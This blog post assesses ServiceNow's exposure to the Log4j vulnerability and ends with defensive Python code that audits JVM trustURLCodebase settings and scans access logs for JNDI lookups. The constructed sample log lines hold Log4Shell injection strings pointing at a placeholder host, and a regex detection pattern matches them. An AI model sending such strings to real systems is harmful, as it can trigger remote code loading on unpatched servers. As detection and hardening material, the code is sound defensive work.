
ServiceNow & Log4j Vulnerability | CVE-2021-44228

ServiceNow has said that they are not affected by the Log4j vulnerability even though they use log4j in their code, and they have further confirmed that they are running a version of Java that prevents this behaviour by default. In short, their Now platform is not affected by the Log4j vulnerability. The MID servers have log4j turned off by default for third-party libraries. They have also said in the post that the Java versions shipped with MID servers are not vulnerable.

The settings below are enabled by default, which prevents any LDAP or RMI call from ServiceNow:

com.sun.jndi.ldap.object.trustURLCodebase=false
com.sun.jndi.rmi.object.trustURLCodebase=false

Source: https://community.servicenow.com/community?id=community_question&sys_id=9f0798fedb144d5439445ac2ca9619d6&view_source=searchResult

KB: https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1000959

As of they are continuing to monitor whether ServiceNow is vulnerable and doing testing as required.

My opinion: Since the code is proprietary, no one knows where they are using the log4j versions, and since ServiceNow is a SaaS vendor, enterprises may not have any control over it, but we should be making sure the API calls from ServiceNow to our internal systems are safe and secure (adding web application firewalls that prevent calls with JNDI).
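Two defender-side checks that follow from the two JVM properties listed above and from the suggestion to filter JNDI calls at a web application firewall, as an added example that is not code from the post or from ServiceNow. The JVM argument list and the log lines are constructed sample data; the property names are the two the post lists, and the log format is an assumed combined-access-log layout, not a ServiceNow log format.

```python
"""
Added example (not from the post or from ServiceNow).
1) audit_jvm_args: confirm a JVM launch line sets both trustURLCodebase
   properties named in the post to false.
2) find_jndi_lookups: scan inbound-request log lines for the JNDI lookup
   token a WAF rule would need to block.
All sample inputs below are constructed.
"""
import re
from typing import Dict, List

# The two properties the post names. Both must be "false" so that a JNDI
# LDAP/RMI reference cannot pull a class from a remote codebase.
REQUIRED_FALSE = (
    "com.sun.jndi.ldap.object.trustURLCodebase",
    "com.sun.jndi.rmi.object.trustURLCodebase",
)


def audit_jvm_args(args: List[str]) -> Dict[str, str]:
    """Map each required property to 'ok', 'enabled' or 'missing'.

    'missing' means the launch line relies on the JDK default (false on
    current JDKs, as the post says), so it is a finding to confirm, not
    proof of exposure. 'enabled' means someone explicitly set it to true.
    """
    props: Dict[str, str] = {}
    for arg in args:
        if arg.startswith("-D") and "=" in arg:
            key, value = arg[2:].split("=", 1)
            props[key] = value
    result: Dict[str, str] = {}
    for key in REQUIRED_FALSE:
        if key not in props:
            result[key] = "missing"
        elif props[key].strip().lower() == "false":
            result[key] = "ok"
        else:
            result[key] = "enabled"
    return result


# Case-insensitive match for a JNDI lookup token and the scheme it names.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def find_jndi_lookups(log_lines: List[str]) -> List[dict]:
    """Return one record per JNDI lookup token found, with line number,
    scheme (lower-cased) and the matched text."""
    hits: List[dict] = []
    for number, line in enumerate(log_lines, 1):
        for match in JNDI_RE.finditer(line):
            hits.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "text": match.group(0),
            })
    return hits


# Constructed sample JVM launch arguments: ldap disabled, rmi explicitly
# re-enabled by mistake.
SAMPLE_ARGS = [
    "-Xmx2g",
    "-Dcom.sun.jndi.ldap.object.trustURLCodebase=false",
    "-Dcom.sun.jndi.rmi.object.trustURLCodebase=true",
]

# Constructed sample access-log lines (hosts use the reserved .invalid TLD).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /api/now/table/incident HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /api/now/table/incident HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "POST /login HTTP/1.1" 302 0 "-" "${JNDI:RMI://example.invalid/b}"',
]

if __name__ == "__main__":
    for key, state in audit_jvm_args(SAMPLE_ARGS).items():
        print(f"{key}: {state}")
    for hit in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {hit['line']}: {hit['scheme']} lookup -> {hit['text']}")
```

The property audit is the check to run on the JVM launch line of any Java service that receives ServiceNow callbacks; the log scan is the minimum a WAF or log-based detection should catch, and it is deliberately case-insensitive because the lookup token is not case-sensitive to log4j.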